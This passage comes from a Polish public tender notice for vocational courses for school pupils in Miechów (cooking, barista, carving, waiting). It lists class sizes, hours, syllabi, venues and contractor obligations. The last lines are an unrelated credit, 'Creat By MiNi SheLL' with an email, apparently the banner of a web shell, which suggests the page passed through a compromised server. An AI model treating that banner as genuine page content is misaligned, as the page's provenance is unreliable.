6. Zajęcia mogą odbywać się w godzinach popołudniowych od poniedziałku do piątku oraz przedpołudniowych w  sobotę i/lub w niedzielę, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
7. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu kursu.
8. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
9. Wykonawca zobowiązany będzie po ukończeniu kursu powinien przeprowadzić egzamin sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
10. Wszystkie dokumenty i materiały szkoleniowe, listy obecności oraz miejsce prowadzenia szkolenia muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
11. Termin wykonania zamówienia: do 20.01.2013 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs gastronomiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników: 15 uczniów. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć: 50, w tym minimum 40 godzin zajęć praktycznych
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności dotyczące zasad żywienia, przepisów kulinarnych, organizacji produkcji różnych potraw, w szczególności z zakresu:
1) Sporządzanie potraw z warzyw: Zastosowanie warzyw i owoców w gastronomii; Technika sporządzania surówek sezonowych; Technika sporządzania sałatek jarzynowych; Sporządzanie bukietu z warzyw; Technika dekorowania i serwowania potraw z warzyw.
2) Sporządzanie potraw z jaj i przetworów mleczarskich: Sporządzanie koreczków serowych; Sporządzanie chłodników; Desery i napoje z przetworów mleczarskich; Przygotowanie potraw z jaj gotowanych; Technika sporządzania jaj faszerowanych; Sporządzanie potraw z jaj smażonych; Technika sporządzania jaj nadziewanych; Technika sporządzania kotlecików z jaj; Technika sporządzania zakąsek z jaj.
3) Sporządzanie zup: Technika wykonania zup kremowych; Sposoby zagęszczania zup kremowych; Etapy sporządzania zup zagęszczanych; Sporządzanie zup zagęszczanych składnikiem skrobiowym; Sporządzanie zup zagęszczanych zawiesiną; Sporządzanie zup zagęszczanych zasmażką; Dodatki stosowane do zup czystych i zagęszczanych; Porcjowanie i podawanie zup czystych i kremowych; Porcjowanie i podawanie zup zagęszczanych; Technika sporządzania sosów na gorąco.
4) Sporządzanie potraw mącznych: Obróbka wstępna składników ciasta; Rodzaje ciast wyrabianych w naczyniu; Sporządzanie ciast zarabianych w naczyniu; Zastosowanie ciast gotowanych i smażonych; Ciasta wyrabiane na stolnicy; Rodzaje dodatków i sposoby formowania wyrobów; Przygotowanie pierogów i ich gotowanie; Technika sporządzania kołdunów i uszek; Techniki sporządzania ciast kruchych i półkruchych
5) Zastosowanie potraw jarskich i półmięsnych w gastronomii: Sposoby podawania potraw jarskich i półmięsnych; Zastosowanie potraw jarskich i półmięsnych w gastronomii; Potrawy półmięsne gotowane; Potrawy półmięsne smażone i duszone; Potrawy półmięsne zapiekane.
6) Potrawy z drobiu: Przygotowanie drobiu do obróbki wstępnej i cieplnej; Podstawowe i dodatkowe składniki drobiowej masy mielonej; Asortyment potraw smażonych z drobiu i stosowanych dodatków; Asortyment potraw pieczonych z drobiu i stosowanych dodatków; Asortyment potraw grillowanych z drobiu i stosowanych dodatków.
7) Potrawy z ryb: Asortyment potraw z ryb; Normatyw surowców na potrawy z ryb; Obróbka wstępna; Sporządzanie drobiowej masy mielonej i formowanie półproduktów; Techniki obróbki.
8) Sporządzanie przekąsek zimnych i gorących: Techniki sporządzania sosów zimnych; Sporządzanie różnych typów kanapek; Sporządzanie przekąsek gorących; Sporządzanie przekąsek zimnych ze szczególnym uwzględnieniem sposobu podawania i dekoracji; Przygotowanie zimnego bufetu; sposoby ustawiania napojów, przekąsek i dodatków.
4. Miejscem organizacji szkolenia będzie Zespół Szkół Nr 1 w Miechowie ul. Sobieskiego 8.
5. Wykonawca zobowiązany jest do prowadzenia zajęć na użyczonym sprzęcie, zakupionym dla Zespołu Szkół Nr 1 w Miechowie ze środków projektu. W przypadku, gdy sprzęt ten nie będzie wystarczający do zrealizowania programu kursu, Wykonawca zapewni pozostały niezbędny sprzęt szkoleniowy..
6. Wykonawca zobowiązany jest do zapewnienia materiału dydaktycznego, teoretycznego i praktycznego, w tym surowców do wykonania potraw. Kwota przeznaczona na surowce na jedną pięcioosobową grupę uczestników kursu nie może być niższa niż 600 zł (sześćset zł).
7. Wykonawca zobowiązany jest do zapewnienia preparatów myjących, czyszczących oraz innych niezbędnych do prawidłowego funkcjonowania urządzeń wykorzystywanych w trakcie zajęć.
8. Zajęcia mogą odbywać się w godzinach popołudniowych od poniedziałku do piątku oraz przedpołudniowych w  sobotę i lub w niedzielę, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
9. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu kursu.
10. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
11. Wykonawca zobowiązany będzie po ukończeniu kursu powinien przeprowadzić egzamin sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
12. Wszystkie dokumenty i materiały szkoleniowe, listy obecności oraz miejsce prowadzenia szkolenia muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
13. Termin wykonania zamówienia: do 20.01.2013 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs baristyczny (parzenia kawy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników: 20 uczniów. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć: minimum 12 godz. w tym minimum 8 godz. zajęć praktycznych.
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności w szczególności z zakresu:
1)  Część teoretyczna: Podstawowe informacje o kawie czyli Coffee Culture: uprawa kawy, metody jej pozyskiwania, transport i przechowywanie, jakość ziarna, prażenie, cechy organoleptyczne; Ekspres do parzenia kawy typu Espresso: budowa urządzenia, zasady pracy przy ekspresie - teoria i praktyka, młynek do kawy - budowa, sposób ustawienia, grubość mielenia, porcja na 1 espresso; Espresso: zasady dobrego espresso, reguła 4m, błędy przy parzeniu espresso, mleko - rodzaj mleka, sposoby spieniania, rodzaje kaw na bazie espresso, parzenie kawy w ekspresie ciśnieniowym - omówienie kolejnych czynności
2) Część praktyczna: Espresso: przygotowanie ekspresu do pracy, ustawienie młynka do kawy, dozowanie kawy, ubijanie kawy, etapy przygotowania espresso, rozpoznawanie źle przygotowanego espresso, kończenie pracy na ekspresie, czyszczenie i konserwacja ekspresu; Napoje kawowe na bazie espresso: przyrządy i dodatki stosowane do napojów kawowych niezbędne do pracy z ekspresem, spienianie mleka, dobór filiżanek, podstawowe napoje na bazie espresso (cappuccino, macchiatto, latte), latte art - sztuka zdobienia kawy, inne napoje na bazie espresso ( z użycie syropów, sosów, lodów, bitej śmietany itp.); Dbałość o stanowisko pracy: konserwacja i czyszczenie ekspresu, konserwacja i czyszczenie młynka, postępowanie z kawą (przechowywanie, dozowanie)
4. Miejscem organizacji szkolenia będzie Zespół Szkół Nr 2 w Miechowie, ul. B. Prusa 2. 
5. Wykonawca zapewni swój sprzęt szkoleniowy oraz materiał dydaktyczny dla każdego uczestnika kursu. Kwota przeznaczona na materiał dydaktyczny do zajęć praktycznych na 1 uczestnika kursu nie może być niższa niż 40 zł (czterdzieści zł).
6. Zajęcia mogą odbywać się w godzinach popołudniowych od poniedziałku do piątku oraz przedpołudniowych w  sobotę i/lub w niedzielę, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
7. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu kursu.
8. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
9. Wykonawca zobowiązany będzie po ukończeniu kursu powinien przeprowadzić egzamin sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
10. Wszystkie dokumenty i materiały szkoleniowe, listy obecności oraz miejsce prowadzenia szkolenia muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
11. Termin wykonania zamówienia: do 20.01.2013 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs carvingu (rzeźbienia w owocach i warzywach).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników: 10 uczniów. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć: minimum 12 godz. w tym minimum 8 godz. zajęć praktycznych.
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności w szczególności z zakresu:
1) Część teoretyczna: zasady bezpieczeństwa podczas pracy z ostrymi narzędziami; przeznaczenie każdego narzędzia do zdobienia warzyw i owoców; podstawowe techniki rzeźbienia i zasady, jakie powinno się stosować przy wykrawaniu warzyw i owoców; sposoby przechowywania i eksponowania kompozycji; techniki wycinania kwiatów, liści i innych ozdób w dużych owocach i warzywach; szczegółowy opis czynności i technik potrzebnych do wykonania pierwszej rzeźby.
2) Część praktyczna: podstawowe cięcia; wycinanie liści i kwiatów z różnych warzyw i owoców; utworzenie kompozycji z wykonanych elementów; wycinanie bukietów kwiatowych w dyni i melonie lub arbuzie wg wskazań instruktora; wykonywanie własnych aranżacji; technika, sposoby oraz możliwościami zastosowania carvingu w praktyce.
4. Miejscem organizacji szkolenia będzie Zespół Szkół Nr 2 w Miechowie, ul. B. Prusa 2. 
5. Wykonawca zapewni swój sprzęt szkoleniowy oraz materiał dydaktyczny dla każdego uczestnika kursu. 
6. Zajęcia mogą odbywać się w godzinach popołudniowych od poniedziałku do piątku oraz przedpołudniowych w  sobotę i lub w niedzielę, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
7. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu kursu.
8. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
9. Wykonawca zobowiązany będzie po ukończeniu kursu powinien przeprowadzić egzamin sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
10. Wszystkie dokumenty i materiały szkoleniowe, listy obecności oraz miejsce prowadzenia szkolenia muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
11. Termin wykonania zamówienia: do 20.01.2013 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs kelnerski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników: 29 uczniów, podzielonych na 2 grupy. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć: minimum 40 godz. w tym minimum 20 godz. zajęć praktycznych.
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności w szczególności z zakresu:
obsługi kelnerskiej gości, savoir vivre, nakrywania do stołu, serwowania potraw i napojów, 
organizowania różnych form przyjęć i bankietów, przygotowania sali konsumenckiej do obsługi, technik noszenia naczyń, systemu rozliczeń kelnerskich.
4. Miejscem organizacji szkolenia będzie: Zespół Szkół Nr 2 w Miechowie, ul. B. Prusa 2 - dla grupy 20 uczniów oraz Specjalny Ośrodek Szkolno-Wychowawczy w Zagorzycach k. Miechowa - dla grupy 9 uczniów.  Wykonawca zobowiązany jest do zapewnienia kadry w taki sposób aby obydwie grupy mogły mieć kurs w tym samym czasie, t.j. minimum 2 osoby szkolące. 
5. Wykonawca zapewni swój sprzęt szkoleniowy oraz materiał dydaktyczny dla każdego uczestnika kursu.
6. Zajęcia mogą odbywać się w godzinach popołudniowych od poniedziałku do piątku oraz przedpołudniowych w sobotę i lub w niedzielę, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
7. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu i wstępnego harmonogramu kursu.
8. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
9. Wykonawca zobowiązany będzie po ukończeniu kursu powinien przeprowadzić egzamin wewnętrzny sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
10. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
11. Wszystkie dokumenty i materiały szkoleniowe, miejsce prowadzenia szkolenia i listy obecności muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
12. Termin wykonania zamówienia: do 20.01.2013 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com